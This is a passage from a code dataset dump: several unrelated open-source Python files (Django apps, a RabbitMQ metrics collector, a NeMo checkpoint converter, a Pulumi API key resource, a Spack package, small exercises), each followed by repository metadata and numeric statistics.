product2 = tf.matmul(matrix2, matrix1)
with tf.Session(tfdevices.localGRPC()) as sess:
res = sess.run(product1)
print(res)
res = sess.run(product2)
print(res)
| 34.638298 | 116 | 0.673219 | 204 | 1,628 | 5.27451 | 0.421569 | 0.066915 | 0.126394 | 0.04461 | 0.268587 | 0.236989 | 0.236989 | 0.236989 | 0.236989 | 0.107807 | 0 | 0.023432 | 0.187346 | 1,628 | 46 | 117 | 35.391304 | 0.789872 | 0 | 0 | 0.064516 | 0 | 0 | 0.209121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.096774 | null | null | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe97e4775b3fbd1abdf826717d17fd4e96f2144c | 353 | py | Python | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 21 | 2018-04-18T17:58:12.000Z | 2022-01-19T12:41:01.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 4 | 2018-04-24T11:04:15.000Z | 2022-02-03T18:35:21.000Z | user_messages/context_processors.py | everaccountable/django-user-messages | 101d539b785bdb440bf166fb16ad25eb66e4174a | [
"MIT"
] | 7 | 2018-03-04T16:03:44.000Z | 2022-02-03T15:50:39.000Z | from django.contrib.messages.constants import DEFAULT_LEVELS
from user_messages.api import get_messages
def messages(request):
"""
Return a lazy 'messages' context variable as well as
'DEFAULT_MESSAGE_LEVELS'.
"""
return {
"messages": get_messages(request=request),
"DEFAULT_MESSAGE_LEVELS": DEFAULT_LEVELS,
}
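For `messages` and `DEFAULT_MESSAGE_LEVELS` to actually reach templates, the processor has to be registered with the template engine; a minimal settings sketch (the dotted path assumes the app layout shown above, and is not taken from the original repo):

```python
# settings.py (sketch, not from the original repository)
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.request",
                "user_messages.context_processors.messages",
            ],
        },
    },
]
```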
| 23.533333 | 60 | 0.708215 | 41 | 353 | 5.878049 | 0.512195 | 0.107884 | 0.165975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203966 | 353 | 14 | 61 | 25.214286 | 0.857651 | 0.220963 | 0 | 0 | 0 | 0 | 0.117647 | 0.086275 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
fe98a505a6e3e05977900098d14a4c4efb60654a | 502 | py | Python | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | Day_5/highest_score.py | ecanro/100DaysOfCode_Python | a86ebe5a793fd4743e0de87454ba76925efdd23d | [
"MIT"
] | null | null | null | ## Highest Score
# 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores: ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
# Write your code below this row 👇
highest_score = 0
for scores in student_scores:
if scores > highest_score:
highest_score = scores
print(f'The highest score is: {highest_score}')
# functional code
print(max(student_scores)) | 26.421053 | 66 | 0.721116 | 82 | 502 | 4.341463 | 0.439024 | 0.292135 | 0.02809 | 0.061798 | 0.101124 | 0.101124 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.173307 | 502 | 19 | 67 | 26.421053 | 0.840964 | 0.250996 | 0 | 0 | 0 | 0 | 0.186486 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
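The manual scan and the built-in agree; a small self-contained check with made-up scores:

```python
def highest(scores):
    # Same manual scan as above: track the best value seen so far.
    best = 0
    for s in scores:
        if s > best:
            best = s
    return best

sample = [78, 65, 89, 86, 55, 91, 64]
assert highest(sample) == max(sample) == 91
print(highest(sample))  # 91
```

Note the manual scan starts from 0, so it assumes non-negative scores; `max()` has no such restriction.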
fea585d93413c287bd31eaa0525d97e26cbdcd0b | 742 | py | Python | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | codeforces.com/1669F/solution.py | zubtsov/competitive-programming | 919d63130144347d7f6eddcf8f5bc2afb85fddf3 | [
"MIT"
] | null | null | null | for i in range(int(input())):
number_of_candies = int(input())
candies_weights = list(map(int, input().split()))
bob_pos = number_of_candies - 1
alice_pos = 0
bob_current_weight = 0
alice_current_weight = 0
last_equal_candies_total_number = 0
while alice_pos <= bob_pos:
if alice_current_weight <= bob_current_weight:
alice_current_weight += candies_weights[alice_pos]
alice_pos += 1
else:
bob_current_weight += candies_weights[bob_pos]
bob_pos -= 1
if alice_current_weight == bob_current_weight:
last_equal_candies_total_number = alice_pos + (number_of_candies - bob_pos - 1)
print(last_equal_candies_total_number)
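The same two-pointer scan, lifted out of the input-reading loop into a pure function for easier testing (the function name is mine, not from the original):

```python
def longest_equal_eating(weights):
    # Alice eats from the left, Bob from the right; whoever has eaten
    # less total weight eats next.  Record the largest number of candies
    # eaten at any moment when both totals are equal.
    lo, hi = 0, len(weights) - 1
    alice = bob = best = 0
    while lo <= hi:
        if alice <= bob:
            alice += weights[lo]
            lo += 1
        else:
            bob += weights[hi]
            hi -= 1
        if alice == bob:
            best = lo + (len(weights) - hi - 1)
    return best

print(longest_equal_eating([10, 20, 10]))      # 2
print(longest_equal_eating([2, 1, 4, 2, 4, 1]))  # 6
print(longest_equal_eating([1, 2, 4, 8, 16]))  # 0
```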
| 29.68 | 91 | 0.665768 | 100 | 742 | 4.47 | 0.27 | 0.232662 | 0.143177 | 0.14094 | 0.342282 | 0.161074 | 0.161074 | 0 | 0 | 0 | 0 | 0.014467 | 0.254717 | 742 | 24 | 92 | 30.916667 | 0.793852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
feb04d32f16beda0e1b583eb23a6f47a91df44ef | 695 | py | Python | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 2 | 2020-12-17T20:19:21.000Z | 2020-12-22T12:46:43.000Z | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 4 | 2021-04-20T08:40:30.000Z | 2022-02-10T07:50:30.000Z | src/applications/blog/migrations/0003_post_author.py | alexander-sidorov/tms-z43 | 61ecd204f5de4e97ff0300f6ef91c36c2bcda31c | [
"MIT"
] | 1 | 2021-02-10T06:42:19.000Z | 2021-02-10T06:42:19.000Z | # Generated by Django 3.1.7 on 2021-03-24 17:41
import django.db.models.deletion
from django.conf import settings
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("blog", "0002_auto_20210323_1834"),
]
operations = [
migrations.AddField(
model_name="post",
name="author",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
]
| 24.821429 | 66 | 0.604317 | 76 | 695 | 5.394737 | 0.605263 | 0.078049 | 0.068293 | 0.107317 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063918 | 0.302158 | 695 | 27 | 67 | 25.740741 | 0.781443 | 0.064748 | 0 | 0.095238 | 1 | 0 | 0.057099 | 0.035494 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228122dba71ea421f33f3e5c51b862184d5fc4c8 | 205 | py | Python | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | 7 | 2019-03-31T17:58:45.000Z | 2020-02-29T22:44:27.000Z | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | 90 | 2019-03-26T01:14:54.000Z | 2021-06-10T21:30:25.000Z | hubcare/metrics/community_metrics/issue_template/urls.py | aleronupe/2019.1-hubcare-api | 3f031eac9559a10fdcf70a88ee4c548cf93e4ac2 | [
"MIT"
] | null | null | null | from django.urls import path
from issue_template.views import IssueTemplateView
urlpatterns = [
path(
'<str:owner>/<str:repo>/<str:token_auth>/',
IssueTemplateView.as_view()
),
]
| 18.636364 | 51 | 0.668293 | 23 | 205 | 5.826087 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204878 | 205 | 10 | 52 | 20.5 | 0.822086 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 0.195122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22849e131dffff72236a4d1d46cddf477f92bab9 | 2,823 | py | Python | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 2772cdbc27a7ba3fedeb6d4241aeee9d2fcbdb80 | [
"MIT"
] | null | null | null | # coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': 'guest',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
except Exception as e:
self.log.error('Could not connect to rabbitmq: %s', e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
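`_publish_metrics` recursively flattens nested stats dicts into dotted metric names; a standalone sketch of that recursion, collecting into a dict instead of publishing:

```python
def flatten(prefix_keys, key, data, out):
    # Mirror of _publish_metrics: descend into nested dicts, join the
    # key path with dots, and keep only numeric leaves.
    value = data[key]
    keys = prefix_keys + [key]
    if isinstance(value, dict):
        for new_key in value:
            flatten(keys, new_key, value, out)
    elif isinstance(value, (int, float)):
        out[".".join(keys)] = value

metrics = {}
stats = {"queue1": {"messages": 5, "rate": {"avg": 1.5}}}
flatten([], "queue1", stats, metrics)
print(metrics)  # {'queue1.messages': 5, 'queue1.rate.avg': 1.5}
```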
| 30.031915 | 78 | 0.54729 | 299 | 2,823 | 5.056856 | 0.361204 | 0.039683 | 0.042328 | 0.025132 | 0.055556 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0.006515 | 0.347503 | 2,823 | 93 | 79 | 30.354839 | 0.814332 | 0.029047 | 0 | 0.096774 | 0 | 0 | 0.123271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.048387 | 0.080645 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2285470cfe61c3208efb829c668012f4eb4c042d | 196 | py | Python | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | 1 | 2019-08-05T12:02:53.000Z | 2019-08-05T12:02:53.000Z | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | null | null | null | classifier/cross_validation.py | ahmdrz/spam-classifier | a9cc3916a7c22545c82f0bfae7e4b95f3b36248f | [
"MIT"
] | null | null | null | from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | 32.666667 | 41 | 0.704082 | 30 | 196 | 4.466667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.193878 | 196 | 6 | 42 | 32.666667 | 0.835443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
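The generator above delegates the splitting to scikit-learn's `KFold`; a dependency-free sketch of what each yielded pair looks like (illustrative names, contiguous folds like sklearn's unshuffled default):

```python
def simple_kfold(n_samples, k):
    # Split indices 0..n_samples-1 into k contiguous test folds; the
    # training set for each fold is every index outside it.
    fold_sizes = [n_samples // k + (1 if i < n_samples % k else 0) for i in range(k)]
    start = 0
    for size in fold_sizes:
        test = list(range(start, start + size))
        train = [i for i in range(n_samples) if i < start or i >= start + size]
        yield train, test
        start += size

splits = list(simple_kfold(6, 3))
print(splits[0])  # ([2, 3, 4, 5], [0, 1])
```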
228b1c94896beb15138918d15679461767abdb01 | 3,238 | py | Python | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | null | null | null | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | null | null | null | examples/nlp/language_modeling/megatron_gpt_ckpt_to_nemo.py | rilango/NeMo | 6f23ff725c596f25fab6043d95e7c0b4a5f56331 | [
"Apache-2.0"
] | 1 | 2021-12-07T08:15:36.000Z | 2021-12-07T08:15:36.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from argparse import ArgumentParser
import torch.multiprocessing as mp
from pytorch_lightning.trainer.trainer import Trainer
from nemo.collections.nlp.models.language_modeling.megatron_gpt_model import MegatronGPTModel
from nemo.collections.nlp.parts.nlp_overrides import NLPSaveRestoreConnector
from nemo.utils import AppState, logging
def get_args():
parser = ArgumentParser()
parser.add_argument(
"--checkpoint_folder",
type=str,
default=None,
required=True,
help="Path to PTL checkpoints saved during training. Ex: /raid/nemo_experiments/megatron_gpt/checkpoints",
)
parser.add_argument(
"--checkpoint_name",
type=str,
default=None,
required=True,
help="Name of checkpoint to be used. Ex: megatron_gpt--val_loss=6.34-step=649-last.ckpt",
)
parser.add_argument(
"--hparams_file",
type=str,
default=None,
required=False,
help="Path config for restoring. It's created during training and may need to be modified during restore if restore environment is different than training. Ex: /raid/nemo_experiments/megatron_gpt/hparams.yaml",
)
parser.add_argument("--nemo_file_path", type=str, default=None, required=True, help="Path to output .nemo file.")
parser.add_argument("--tensor_model_parallel_size", type=int, required=True, default=None)
args = parser.parse_args()
return args
def convert(rank, world_size, args):
app_state = AppState()
app_state.data_parallel_rank = 0
trainer = Trainer(gpus=args.tensor_model_parallel_size)
# TODO: reach out to PTL for an API-safe local rank override
trainer.accelerator.training_type_plugin._local_rank = rank
if args.tensor_model_parallel_size is not None and args.tensor_model_parallel_size > 1:
# inject model parallel rank
checkpoint_path = os.path.join(args.checkpoint_folder, f'mp_rank_{rank:02d}', args.checkpoint_name)
else:
checkpoint_path = os.path.join(args.checkpoint_folder, args.checkpoint_name)
model = MegatronGPTModel.load_from_checkpoint(checkpoint_path, hparams_file=args.hparams_file, trainer=trainer)
model._save_restore_connector = NLPSaveRestoreConnector()
model.save_to(args.nemo_file_path)
logging.info(f'NeMo model saved to: {args.nemo_file_path}')
def main() -> None:
args = get_args()
world_size = args.tensor_model_parallel_size
mp.spawn(convert, args=(world_size, args), nprocs=world_size, join=True)
if __name__ == '__main__':
main() # noqa pylint: disable=no-value-for-parameter
| 37.218391 | 218 | 0.734713 | 444 | 3,238 | 5.177928 | 0.414414 | 0.026098 | 0.036973 | 0.050022 | 0.196607 | 0.122662 | 0.122662 | 0.073075 | 0.034798 | 0 | 0 | 0.006749 | 0.176343 | 3,238 | 86 | 219 | 37.651163 | 0.855268 | 0.220198 | 0 | 0.207547 | 0 | 0.037736 | 0.226874 | 0.075758 | 0 | 0 | 0 | 0.011628 | 0 | 1 | 0.056604 | false | 0 | 0.132075 | 0 | 0.207547 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228b861994dfd3c8d5b7524f5b44ae49bacc2148 | 6,007 | py | Python | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/apigateway/api_key.py | dixler/pulumi-aws | 88838ed6d412c092717a916b0b5b154f68226c3a | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class ApiKey(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN)
"""
created_date: pulumi.Output[str]
"""
The creation date of the API key
"""
description: pulumi.Output[str]
"""
The API key description. Defaults to "Managed by Pulumi".
"""
enabled: pulumi.Output[bool]
"""
Specifies whether the API key can be used by callers. Defaults to `true`.
"""
last_updated_date: pulumi.Output[str]
"""
The last update date of the API key
"""
name: pulumi.Output[str]
"""
The name of the API key
"""
tags: pulumi.Output[dict]
"""
Key-value mapping of resource tags
"""
value: pulumi.Output[str]
"""
The value of the API key. If not specified, it will be automatically generated by AWS on creation.
"""
def __init__(__self__, resource_name, opts=None, description=None, enabled=None, name=None, tags=None, value=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an API Gateway API Key.
> **NOTE:** Since the API Gateway usage plans feature was launched on August 11, 2016, usage plans are now **required** to associate an API key with an API stage.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The API key description. Defaults to "Managed by Pulumi".
:param pulumi.Input[bool] enabled: Specifies whether the API key can be used by callers. Defaults to `true`.
:param pulumi.Input[str] name: The name of the API key
:param pulumi.Input[dict] tags: Key-value mapping of resource tags
:param pulumi.Input[str] value: The value of the API key. If not specified, it will be automatically generated by AWS on creation.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/api_gateway_api_key.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if description is None:
description = 'Managed by Pulumi'
__props__['description'] = description
__props__['enabled'] = enabled
__props__['name'] = name
__props__['tags'] = tags
__props__['value'] = value
__props__['arn'] = None
__props__['created_date'] = None
__props__['last_updated_date'] = None
super(ApiKey, __self__).__init__(
'aws:apigateway/apiKey:ApiKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, created_date=None, description=None, enabled=None, last_updated_date=None, name=None, tags=None, value=None):
"""
Get an existing ApiKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] created_date: The creation date of the API key
:param pulumi.Input[str] description: The API key description. Defaults to "Managed by Pulumi".
:param pulumi.Input[bool] enabled: Specifies whether the API key can be used by callers. Defaults to `true`.
:param pulumi.Input[str] last_updated_date: The last update date of the API key
:param pulumi.Input[str] name: The name of the API key
:param pulumi.Input[dict] tags: Key-value mapping of resource tags
:param pulumi.Input[str] value: The value of the API key. If not specified, it will be automatically generated by AWS on creation.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/api_gateway_api_key.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["created_date"] = created_date
__props__["description"] = description
__props__["enabled"] = enabled
__props__["last_updated_date"] = last_updated_date
__props__["name"] = name
__props__["tags"] = tags
__props__["value"] = value
return ApiKey(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 45.507576 | 170 | 0.662227 | 780 | 6,007 | 4.85641 | 0.214103 | 0.031679 | 0.038015 | 0.029039 | 0.525607 | 0.471489 | 0.447466 | 0.396779 | 0.368004 | 0.326558 | 0 | 0.001553 | 0.249542 | 6,007 | 131 | 171 | 45.854962 | 0.838731 | 0.374064 | 0 | 0.03125 | 1 | 0 | 0.141145 | 0.009321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.015625 | 0.09375 | 0.03125 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
228d76877f0d9f67ffc6dc7483c7c0a95962b0f9 | 864 | py | Python | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2020-10-15T01:08:42.000Z | 2021-10-18T01:28:18.000Z | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2019-07-30T10:12:28.000Z | 2019-12-17T09:02:27.000Z | var/spack/repos/builtin/packages/perl-ipc-run/package.py | adrianjhpc/spack | 0a9e4fcee57911f2db586aa50c8873d9cca8de92 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2019-07-30T09:42:14.000Z | 2021-01-25T05:39:20.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PerlIpcRun(PerlPackage):
"""IPC::Run allows you to run and interact with child processes using
files, pipes, and pseudo-ttys. Both system()-style and scripted usages are
supported and may be mixed. Likewise, functional and OO API styles are both
supported and may be mixed."""
homepage = "https://metacpan.org/pod/IPC::Run"
url = "https://cpan.metacpan.org/authors/id/T/TO/TODDR/IPC-Run-20180523.0.tar.gz"
version('20180523.0', sha256='3850d7edf8a4671391c6e99bb770698e1c45da55b323b31c76310913349b6c2f')
depends_on('perl-io-tty', type=('build', 'run'))
depends_on('perl-readonly', type='build')
| 39.272727 | 100 | 0.730324 | 119 | 864 | 5.285714 | 0.731092 | 0.028617 | 0.047695 | 0.054054 | 0.069952 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103825 | 0.152778 | 864 | 21 | 101 | 41.142857 | 0.755464 | 0.503472 | 0 | 0 | 0 | 0.142857 | 0.531863 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
228e9262ba137f922fefb676a2a9e3eabc4bf87c | 804 | py | Python | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
] | 95 | 2021-09-16T00:35:17.000Z | 2022-03-31T04:59:05.000Z | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
] | 16 | 2021-10-05T12:29:33.000Z | 2022-03-31T17:59:20.000Z | src/tevatron/tevax/loss.py | vjeronymo2/tevatron | 7235b0823b5c3cdf1c8ce8f67cb5f1209218086a | [
"Apache-2.0"
